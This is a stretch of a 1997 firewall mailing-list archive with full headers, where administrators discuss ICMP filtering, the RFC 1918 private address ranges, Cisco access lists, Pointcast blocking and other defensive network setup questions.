<01BBFDD5.A972B930@cidexchange.infosel.com.mx>; Thu, 9 Jan 1997 02:34:39 -0600 Message-ID: From: =?iso-8859-1?Q?Jaime_Alberto_Botello_Cant=FA?= To: "'Darren Cromer'" , "'firewalls@GreatCircle.COM'" Subject: RE: internal filtering router - filter config? Date: Thu, 9 Jan 1997 02:34:34 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren, You have to check the message type of the echo reply (ping reply) and the echo request. ICMP message has message type, for example echo reply has the message type number 0, and the echo request has the number 8. If you want to deny any ping from outside to your private network you can block ICMP packets with the message type echo request (message number 8). Remember that ping is the primary tool to check if a host is up, if a hacker try to ping your machines, and your router block this, MAYBE he don't going to try nothing else. See ya >-----Original Message----- >From: Darren Cromer [SMTP:DarrenCr@Attachmate.com] >Sent: Martes 7 de Enero de 1997 8:42 AM >To: 'Ricardo Alvarado'; 'firewalls@GreatCircle.COM' >Subject: RE: internal filtering router - filter config? > >Why ICMP? Im curious what inherent risk that would present. > >I too am setting up a screening firewall, but I want to allow pings to >traverse the external router. (any advice on how to filter all ICMP >except >pings?) > >>---------- >>From: Ricardo Alvarado[SMTP:ralvarado@avantel.com.mx] >>Sent: Friday, January 03, 1997 10:20 AM >>To: firewalls@GreatCircle.COM >>Subject: Re: internal filtering router - filter config? >> >>>What type of things would you filter on the internal router? or even >>>the external router? I am going to be installing a firewall real soon >>>and would really appreciate any help. >>> >>>-steve. >>>matkoski@dreamscape.com >> >>In your external router you'd block any ICMP traffic going back and >>forth, as well as any packets bearing one of your internal IP addresses, >>as a source address, especially if these are going INTO your protected >>network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill >>any ports that your users will not be using, andl leave just mail, web, >>ftp, etc. >> >>ricardo >>ralvarado@avantel.com.mx >> >> > From firewalls-owner Thu Jan 9 20:53:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA15008 for firewalls-outgoing; Thu, 9 Jan 1997 20:07:51 -0800 (PST) Received: from sebastion.sa.camtech.com.au (sebastion.sa.camtech.com.au [203.28.3.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA14963 for ; Thu, 9 Jan 1997 20:07:36 -0800 (PST) Received: (from uucp@localhost) by sebastion.sa.camtech.com.au (8.6.10/8.6.10) id OAA25669; Fri, 10 Jan 1997 14:40:04 +1030 Received: from mail.ct(192.168.1.2) by sebastion via smap (V1.3) id sma025667; Fri Jan 10 14:39:47 1997 Received: from tossa.ct (tossa [192.168.1.3]) by slingshot.camtech.com.au (8.6.12/8.6.12) with ESMTP id OAA14648; Fri, 10 Jan 1997 14:37:38 +1030 From: David Murray Received: (dmurray@localhost) by tossa.ct (8.7.5/8.6.9) id OAA03370; Fri, 10 Jan 1997 14:37:01 +1030 (CST) Date: Fri, 10 Jan 1997 14:37:01 +1030 (CST) Message-Id: <199701100407.OAA03370@tossa.ct> To: uscny8hb@ibmmail.com Subject: Re: registered IP addresses? Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: A4YgmCs86V33KthBjRVGbw== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, The RFC is RFC 1918. Cheers Dave. ___________________________________________________________________________ David Murray Phone: +61 8 8303 3300 Systems Engineer Fax: +61 8 8303 4403 Camtech (S.A.) Pty. Ltd. Email: dmurray@camtech.com.au WWW: www.camtech.com.au PO Box 128, Office : 8th Floor, 10 Pulteney Street, Rundle Mall, Adelaide SA Adelaide, SA 5000. Australia. ___________________________________________________________________________ > From firewalls-owner@GreatCircle.COM Fri Jan 10 14:31 CST 1997 > Date: Thu, 09 Jan 1997 09:52:15 -0500 > From: "Steven E. Matkoski" > MIME-Version: 1.0 > To: Firewalls Mailing List > Subject: registered IP addresses? > Content-Transfer-Encoding: 7bit > > Does someone know what the registered IP addresses are that should be > used for internal networks. These are the addresses that are not routed > to the Internet. or even the RFC#? > > -- > Thanks! > -steve. > matkoski@dreamscape.com > From firewalls-owner Thu Jan 9 20:54:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA11290 for firewalls-outgoing; Thu, 9 Jan 1997 19:36:28 -0800 (PST) Received: from ns1.fni.com (ns1.fni.com [204.181.104.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA10932 for ; Thu, 9 Jan 1997 19:30:25 -0800 (PST) Received: from ns1.fni.com (ns1.fni.com [204.181.104.1]) by ns1.fni.com (8.8.4/8.8.4) with SMTP id VAA20508; Thu, 9 Jan 1997 21:29:12 -0600 Date: Thu, 9 Jan 1997 21:29:12 -0600 (CST) From: Michael Brennen To: "Steven E. Matkoski" cc: Firewalls Mailing List Subject: Re: registered IP addresses? In-Reply-To: <32D5061F.2F66@dreamscape.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk RFC 1918. -- Michael (mbrennen@fni.com) On Thu, 9 Jan 1997, Steven E. Matkoski wrote: > Does someone know what the registered IP addresses are that should be > used for internal networks. These are the addresses that are not routed > to the Internet. or even the RFC#? From firewalls-owner Thu Jan 9 21:29:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA20496 for firewalls-outgoing; Thu, 9 Jan 1997 20:35:26 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA20232 for ; Thu, 9 Jan 1997 20:34:29 -0800 (PST) Received: from clonvick-pc.cisco.com (c1robo13.cisco.com [171.68.13.13]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id UAA25423; Thu, 9 Jan 1997 20:33:37 -0800 (PST) Message-Id: <2.2.32.19970110042309.00727bd4@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 09 Jan 1997 22:23:09 -0600 To: uscny8hb@ibmmail.com, Firewalls Mailing List From: Chris Lonvick Subject: Re: registered IP addresses? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Steve, Check out RFC-1918 - Address Allocation for Private Internets and RFC-1631 - The IP Network Address Translator (NAT) >From RFC-1918: ---snip--- Rekhter, et al Best Current Practice [Page 3] RFC 1918 Address Allocation for Private Internets February 1996 3. Private Address Space The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets: 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) ---/snip--- Hope this helps, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1-713-778-5663 At 09:52 AM 1/9/97 -0500, Steven E. Matkoski wrote: >Does someone know what the registered IP addresses are that should be >used for internal networks. These are the addresses that are not routed >to the Internet. or even the RFC#? > >-- >Thanks! >-steve. >matkoski@dreamscape.com > > > From firewalls-owner Thu Jan 9 23:29:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA07363 for firewalls-outgoing; Thu, 9 Jan 1997 23:25:01 -0800 (PST) Received: from extol.com.my (ns.extol.com.my [202.185.238.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA07341 for ; Thu, 9 Jan 1997 23:23:16 -0800 (PST) Received: by portal.extol.com.my id <21897>; Fri, 10 Jan 1997 23:32:52 +0800 Message-Id: <97Jan10.233252gmt+0800.21897@portal.extol.com.my> Date: Fri, 10 Jan 1997 22:37:43 +0800 From: pclow Reply-To: pclow@pc.jaring.my X-Sender: pclow (Unverified) X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: Cyber Net-ghost CC: firewalls@GreatCircle.COM Subject: Re: Where can i download the rainbow books ?? X-Priority: Normal References: <199701091856.CAA03347@sirius.hkstar.com> Content-Type: multipart/alternative; boundary="----------3314A18327213" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------3314A18327213 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Cyber Net-ghost wrote: > > > Are there any hacker in Hong Kong ??? Try the local butcher stall in the market :) ------------3314A18327213 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
Cyber Net-ghost wrote:



> Are there any hacker in Hong Kong ???

Try the local butcher stall in the market :) 
------------3314A18327213-- From firewalls-owner Fri Jan 10 00:14:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA10006 for firewalls-outgoing; Fri, 10 Jan 1997 00:11:26 -0800 (PST) Received: from kexin.kexin.co.kr (kexin2.kexin.co.kr [210.126.192.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA09998 for ; Fri, 10 Jan 1997 00:11:16 -0800 (PST) Received: by kexin.kexin.co.kr; id CAA16522; Sat, 11 Jan 1997 02:08:24 +0900 (JST) Message-Id: <199701101708.CAA16522@kexin.kexin.co.kr> Received: from unknown(201.201.1.4) by kexin.kexin.co.kr via smap (V3.1.1) id xma016520; Sat, 11 Jan 97 02:08:16 +0900 From: "Jung Jun Lee" To: Subject: SmartDisk Homepage location? Date: Fri, 10 Jan 1997 17:12:14 +0900 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi... Is Anybody know Smartdisk homepage location? The location I know is http://infolane.com/smartdisk/smartdisk.html . but There is no reponse . Yes Time out .. Please tell me Smartdisk homepage.. Thanks From firewalls-owner Fri Jan 10 00:45:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11103 for firewalls-outgoing; Fri, 10 Jan 1997 00:31:59 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA10716 for ; Fri, 10 Jan 1997 00:29:16 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vicK7-0004GbC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 09:28:23 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Fri, 10 Jan 97 09:28 MET Received: by lina id m0vibsH-0004imC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 08:59:37 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: which mta 4 dmz To: stesin@gu.kiev.ua Date: Fri, 10 Jan 1997 08:59:36 +0100 (MET) Cc: firewalls@greatcircle.com In-Reply-To: <199701091526.RAA02686@creator.gu.kiev.ua> from "Andrew Stesin" at Jan 9, 97 05:26:47 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 5. SVR4.2 mail system (comes i.e. with SCO UnixWare 2.1.x) Is this PP or PDMF? Anyway.. both are old and blown up mail programs... Greetings Bernd From firewalls-owner Fri Jan 10 00:59:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11572 for firewalls-outgoing; Fri, 10 Jan 1997 00:35:29 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA11397 for ; Fri, 10 Jan 1997 00:34:43 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vicK6-0004GiC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 09:28:22 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Fri, 10 Jan 97 09:28 MET Received: by lina id m0vibq0-0004imC (Debian Smail-3.2 1996-Jul-4 #2); Fri, 10 Jan 1997 08:57:16 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! To: cconov@exp2.is.xpark.pmh.org (Cary Conover) Date: Fri, 10 Jan 1997 08:57:15 +0100 (MET) Cc: ChrisP@steldyn.com, albert.franke@ramstein.af.mil, firewalls@greatcircle.com In-Reply-To: <32D4FF1B.6956@exphub.pmh.org> from "Cary Conover" at Jan 9, 97 08:22:19 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I don't know if you folks caught this or not. He is on a LAN on a > fairly large Air Force Base in Germany. This means not only is his > Website open to attack so are many of the bases computer systems. It > appears that there are larger issues here than meet the eye. You should know that no classified information is allowed to be stored on public accessable computers. There are usually no confidencial rated material stored on those kind of unsercured lans. At least in germany it's even forbidden to used wordprocessing on those systems for secure documents. I dont know about the USAF, but I'm quite sure they handle it the same way. Note: the best firewall is a 2inch air gap, still. Greetings Bernd From firewalls-owner Fri Jan 10 03:29:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA22551 for firewalls-outgoing; Fri, 10 Jan 1997 03:18:50 -0800 (PST) Received: from mcmail.com (email.mcmail.com [195.44.0.12]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA22543 for ; Fri, 10 Jan 1997 03:18:32 -0800 (PST) Received: from solar by mcmail.com (SMI-8.6/SMI-SVR4) id LAA12202; Fri, 10 Jan 1997 11:19:07 GMT Message-ID: <32D62575.7C0B@mcmail.com> Date: Fri, 10 Jan 1997 11:18:13 +0000 From: Peter Reply-To: peter@mcmail.com X-Mailer: Mozilla 2.02E (OS/2; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: registered IP addresses References: <199701100900.BAA13596@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Does someone know what the registered IP addresses are that should be > used for internal networks. These are the addresses that are not routed > to the Internet. or even the RFC#? RFC1597 used to be the one, but there's a new one superceding that. I can't remember which one that is, but 1597 will give you all you need. The addresses for internal use are: Class A : 10.x.x.x Class B : 172.16.x.x .. 172.31.x.x Class C : 192.168.x.x I've come across quite a few sites with 'random' IP numbering, so congratulations for doing it right ;-) -- Regards, /// Peter /// "It takes a man to suffer ignorance and smile" - Sting "OK, what part of 'NO' don't you understand ?" From firewalls-owner Fri Jan 10 03:44:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA22639 for firewalls-outgoing; Fri, 10 Jan 1997 03:23:43 -0800 (PST) Received: from sunrise (sunrise.solmelia.es [194.179.70.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA22611 for ; Fri, 10 Jan 1997 03:22:07 -0800 (PST) Received: from (firewall) by sunrise (5.x/SMI-SVR4) id AA22459; Fri, 10 Jan 1997 12:23:54 +0100 Message-Id: <9701101123.AA22459@sunrise> From: israel.serrano@solmelia.es Date: Fri, 10 Jan 97 12:08:24 To: Firewalls Subject: CISCO routing X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. See, We have a Cisco Router which routes all incoming X.25 traffic, a FR line and the corporate LAN. Through the X.25 Interface we get traffic from tens of places, and the main idea is to "create" virtual subnetworks making use of the ACL (IP). Let's say there are 30 places connecting to the serial interface (X.25 IP encapsulted) and I would like to allow access from one host on the corp. LAN to all of the places (each one of the with their own IP network). But the sites should only be able to access some other defined sites (using ACLs ??). The main question is if this is possible at all? (it's like using the Cisco as a firewall, or at least as an IP packet filter). Thanks a lot. Luis Israel Serrano Barge Departamento de Sistemas de Información / Information Technology Department Sol Meliá (http://www.solmelia.es) email: israel.serrano@solmelia.es Tlf: +34 (9)71 43 70 57 Fax: +34 (9)71 43 70 52 From firewalls-owner Fri Jan 10 04:44:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA25885 for firewalls-outgoing; Fri, 10 Jan 1997 04:27:05 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA25831 for ; Fri, 10 Jan 1997 04:26:20 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id EAA12911; Fri, 10 Jan 1997 04:26:00 -0800 (PST) Message-Id: <3.0.32.19970110072558.006ecb9c@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 10 Jan 1997 07:26:01 -0500 To: uscny8hb@ibmmail.com From: Paul Ferguson Subject: Re: registered IP addresses? Cc: Firewalls Mailing List Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think you are referring to RFC1918. - paul At 09:52 AM 1/9/97 -0500, Steven E. Matkoski wrote: >Does someone know what the registered IP addresses are that should be >used for internal networks. These are the addresses that are not routed >to the Internet. or even the RFC#? > >-- >Thanks! >-steve. >matkoski@dreamscape.com > > -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Fri Jan 10 04:59:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA25764 for firewalls-outgoing; Fri, 10 Jan 1997 04:23:50 -0800 (PST) Received: from salyut.mis.gla.ac.uk (salyut.mis.gla.ac.uk [130.209.164.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA25723 for ; Fri, 10 Jan 1997 04:23:23 -0800 (PST) Received: from set1.mis.gla.ac.uk (set1.mis [130.209.164.51] sender igabrie) by salyut.mis.gla.ac.uk (8.7.6/UK-2.2a/mis-sparc) with SMTP id MAA28540 for ; Fri, 10 Jan 1997 12:20:43 GMT Message-Id: <3.0.1.32.19970110122043.006751bc@salyut.mis.gla.ac.uk> X-Sender: igabrie@salyut.mis.gla.ac.uk X-Mailer: Windows Eudora Light Version 3.0.1 beta 4 (32) Date: Fri, 10 Jan 1997 12:20:44 +0000 To: Firewalls@greatcircle.com From: "INDERJIT.S.GABRIE" Subject: Network Monitoring soft../Firewall Books... Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi fellow netters Could someone tell me how i can get hold of Network Monitoring software , preferrable shareware, which would allow me to monitor,any bottlenecking on systems.Most of the PC's are remotely situated at different depts. and i want check the network activity etc. from my pc located on my desk. I use a PC which has Win95 operating software on it,in the past when i had a Apple mac, i knew there was a software called "INtermapper", which basically showed the traffic flow graphically...it was simply to use and you enter the IP No. and this software automatically pings the machine shows all the physical connections etc etc... Every bit of help much appreciated....thanks...indy ______________________________________ MR.INDERJIT.S.GABRIE | TEL: 0141-330-3552 I.T.SYSTEM SUPPORT | FAX: 0141-330-4953 UNIVERSITY OF GLASGOW | E-mail:IGabrie@salyut.mis.gla.ac.uk DEPARTMENT OF M.I.S. | (Management Information Services) Gilbert Scott Building,(Main Building),3rd Floor Room 635B, Glasgow G12 8QQ, Scotland, U.K. ______________________________________ " Reality is an illusion - perception is what counts " ______________________________________ From firewalls-owner Fri Jan 10 05:35:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29246 for firewalls-outgoing; Fri, 10 Jan 1997 05:16:01 -0800 (PST) Received: from ereapp.erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA29230 for ; Fri, 10 Jan 1997 05:15:47 -0800 (PST) Received: (from smap@localhost) by ereapp.erenj.com (8.8.3/8.8.3) id IAA03072; Fri, 10 Jan 1997 08:15:00 -0500 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma003049; Fri Jan 10 08:14:38 1997 Received: from stargate.erenj.com (stargate.erenj.com [159.70.1.8]) by eredns.erenj.com (8.7.4/8.7.3) with SMTP id IAA12525; Fri, 10 Jan 1997 08:14:37 -0500 Received: from stargate.erenj.com by stargate.erenj.com; (5.65v3.2/1.1.8.2/12Feb96-1009AM/bdboyle@erenj.com) id AA01391; Fri, 10 Jan 1997 08:14:36 -0500 Message-Id: <32D640BC.167E@erenj.com> Date: Fri, 10 Jan 1997 08:14:36 -0500 From: "Bryan D. Boyle" Organization: Exxon Research and Engineering Co. X-Mailer: Mozilla 3.0C-NSCP (X11; I; OSF1 V4.0 alpha) Mime-Version: 1.0 To: Chris Liljenstolpe Cc: firewalls@GreatCircle.COM Subject: Re: Pointcast References: <3.0.32.19970109181317.0124b338@pop.io.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Liljenstolpe wrote: > > The last time I checked, I-server only ran on NT :( Yep, and it is not intuituve to set up. Pointcast seems to be making the most of their new relationship with Microsoft and delivering software that is hard to set up, and counterintuitive to use. I have been examining the netscape proxy version 2.5 with webtrack filtering enabled. In the filtering configuration, you can forbid dotted-decimal domains. Pointcast seems (at least from my logs...) to favor not registering names with any dns for their news broadcast servers; cutting off any access at the corporate proxy to dotted decimal hosts will serve the same purpose, and flush the usrs of this trojan horse program out when their screen savers stop working in real time. Yeah, there is a burst of whining, but, if mgmt has made it clear that pointcast is not a certified application in your network, then this may be a way to clean up the act. Just a thought. -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 #include | http://www.access.digex.net/~bdboyle/index.html "They that can give up liberty to obtain a little temporary safety deserve neither liberty nor safety." - Benjamin Franklin, Historical Review of Pennsylvania From firewalls-owner Fri Jan 10 05:44:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA01409 for firewalls-outgoing; Fri, 10 Jan 1997 05:41:37 -0800 (PST) Received: from garanti1.garanti.com.tr ([194.54.51.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA01328 for ; Fri, 10 Jan 1997 05:40:22 -0800 (PST) Received: from Mailhub by garanti1.garanti.com.tr id AA05958; Fri, 10 Jan 1997 15:38:24 +0300 Received: from GarantiUser by GarantiMailServer id AA21930; Fri, 10 Jan 1997 15:36:47 +0300 Received: by SMTPGW.FW.GARANTI.COM.TR with Microsoft Mail id <32D6D264@SMTPGW.FW.GARANTI.COM.TR>; Fri, 10 Jan 97 15:36:04 PST From: "Cihan Subasi (Garanti Tic)" To: firewall Subject: RealAudio clients behind the FW... Date: Fri, 10 Jan 97 15:32:00 PST Message-Id: <32D6D264@SMTPGW.FW.GARANTI.COM.TR> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm having problems configuring FW to allow RealAudio packets...Port 7070 seems open but data transmission on a UDP port do not occur...Please help.... Thanks Cihan From firewalls-owner Fri Jan 10 06:14:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA03236 for firewalls-outgoing; Fri, 10 Jan 1997 06:09:20 -0800 (PST) Received: from gatekeeper.ing.nl (gatekeeper.ing.nl [194.178.239.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA03222 for ; Fri, 10 Jan 1997 06:09:12 -0800 (PST) From: Robin.Pollard@mail.ing.nl Received: by ING-mailhub; id AA26288; Fri, 10 Jan 1997 15:09:43 +0100 X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002238963000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002238963000002*@MHS> To: firewalls Subject: A simple firewall requirement ? Date: Fri, 10 Jan 1997 15:04:59 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking at ways to provide global access to our internal mail system (cc:Mail) for mobile users. We have cc:Mail "post offices" where user mail is stored at various offices throughout the globe, all linked to a central hub here via our own VPN (TCP/IP). The remote users need to be able to make a (TCP/IP) connection from their laptop into the VPN and down to their PO to get mail. We have access to X28 access points in most of the world. I was thinking of a PPP dialup machine here, (accessed via X28), that will route packets from a limited number of IP addresses (The mobile users) to the IP addresses of the mail PO's only on the port cc:Mail uses (cc0) all else is of course excluded. Lotus claim cc:Mail sends all it's traffic well encrypted but keep the algorithm secret :) we trust the network provider enough to be happy with this. What sort of hardware can do this, will a single box Linux solution do or can it not filter in that detail ? The PPP point is exposed to the world (or anyone who hacks our network provider) what attacks is it open to? Should the PPP box sit outside another filtering router incase it is compromised or can it be locked down tight with such limited requirements. Any big holes I should be aware of ? TIA, Robin Pollard Infrastructure Support ING Bank International robin.pollard@mail.ing.nl From firewalls-owner Fri Jan 10 06:31:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA04392 for firewalls-outgoing; Fri, 10 Jan 1997 06:19:04 -0800 (PST) Received: from mole.mole.org (marmot.mole.org [204.216.57.191]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA04385 for ; Fri, 10 Jan 1997 06:18:56 -0800 (PST) Received: (from mail@localhost) by mole.mole.org (8.6.12/8.6.12) id OAA20758; Fri, 10 Jan 1997 14:18:14 GMT Received: from meerkat.mole.org(206.197.192.110) by mole.mole.org via smap (V1.3) id sma020752; Fri Jan 10 14:17:45 1997 Received: (from mrm@localhost) by meerkat.mole.org (8.6.11/8.6.9) id GAA05039; Fri, 10 Jan 1997 06:17:34 -0800 Date: Fri, 10 Jan 1997 06:17:34 -0800 From: "M.R.Murphy" Message-Id: <199701101417.GAA05039@meerkat.mole.org> To: peter.maersk-moller@jrc.it Subject: Re: CheckRite Laser Checks Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter Maersk-Moller writes: >This is not firewall related but it is firewall mailing list related. ... >I used to trace down the sender of junkmail and filled their mailbox and >congested their Internet connection or their ISP Internet connection. After >that I usually used to find the bosses of the responsible for sending >junkmail to explain how much dammage their employees have brought to >their companies, but it seems there are to many incompetent loonies in the >world. > I help out a small ISP. Imagine how considerate it is of the other users of the ISP when some rude person drops a mailbomb. A spammer signs up for an account and then sends the spam. The spam may point to a web page on another ISP, Then the spammer is off to another ISP to do the same thing. Some only login to the ISP once. The spammers seem as clever as the mailbombers are short-sighted. A simple report to either "abuse@someisp.net" or "postmaster@someisp.net" is sufficient. Notice the "or", both addresses frequently end up going to the same group of people or person. I apologize for the off-topic followup, but mailbombers really irk me. -- Mike Murphy mrm@Mole.ORG +1 619 598 5874 Better is the enemy of Good From firewalls-owner Fri Jan 10 06:44:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA04845 for firewalls-outgoing; Fri, 10 Jan 1997 06:27:00 -0800 (PST) Received: from polaris.pacificnet.net (polaris.pacificnet.net [207.171.0.250]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA04838 for ; Fri, 10 Jan 1997 06:26:53 -0800 (PST) From: osiris@pacificnet.com Received: from lwash (pm1-22.pacificnet.net [207.171.17.23]) by polaris.pacificnet.net (8.6.11/8.6.11) with SMTP id GAA26965; Fri, 10 Jan 1997 06:25:42 -0800 Message-ID: <32D65FFE.8B1@pacificnet.com> Date: Fri, 10 Jan 1997 07:27:58 -0800 Organization: - X-Mailer: Mozilla 3.01Gold (Win95; I) MIME-Version: 1.0 To: KENNETH PHANG CC: "'Firewall digest'" Subject: Re: Government and National Security References: <01BBFE3C.05A4CD40@sos.dataprep.com.my> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk KENNETH PHANG wrote: > > Hi all, > > Currently i am doing a research on the Electronic Government Information System and National Security related to computer security and access and wonder anybody can point out where can I get more information on these issues. Any related URL would be grateful. I would like to make an apology to everybody on the list if my question is a bit off topic. > Hi Kent. (Some people here may not currently have the document listed below and therefore, I have posted it instead of making a mail reply.) You need this document: "Electronic Resources for Security Related Information" CIAC-2307 R.1, Richard Feingold The document is available here: ftp://ciac.llnl.gov (128.115.19.53) at Lawrence Livermore Labs. The HTTP address is: http://ciac.llnl.gov/cgi-bin/index/documents. The document is basically a large collection of links, FTP sites, HTTP sites, mailing addresses and bulletin boards. (It is, to my knowledge, ony available in Acrobat format. You'll need to get the plugin or a shareware version of Adobe Acrobat to read it. You can get that software here: http://www.adobe.com/prodindex/acrobat/readstep.html ) I would bet that you will find what you are looking for in the aforementioned document. Osiris From firewalls-owner Fri Jan 10 07:16:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA05610 for firewalls-outgoing; Fri, 10 Jan 